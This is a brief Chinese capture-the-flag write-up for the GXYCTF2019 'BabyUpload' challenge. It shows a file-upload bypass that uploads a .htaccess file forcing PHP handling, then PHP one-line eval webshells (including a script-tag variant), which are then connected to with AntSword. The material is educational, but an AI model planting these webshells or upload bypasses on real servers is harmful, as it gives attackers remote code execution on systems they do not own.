当前位置: 代码迷 >> 综合 >> [GXYCTF2019]BabyUpload
  详细解决方案

[GXYCTF2019]BabyUpload

热度:8   发布时间:2024-02-04 16:26:45.0

题目
图片.png
过程
png文件不许上传,尝试上传jpg

修改后缀名为.htaccess,文件内容为

SetHandler application/x-httpd-php

image

上传一句话木马

<?php eval($_POST[cmd]);?>

失败,换一种方式

<script language='php'>eval($_POST[cmd]);</script>
image

上传成功,蚁剑连接一下,在根目录找到flag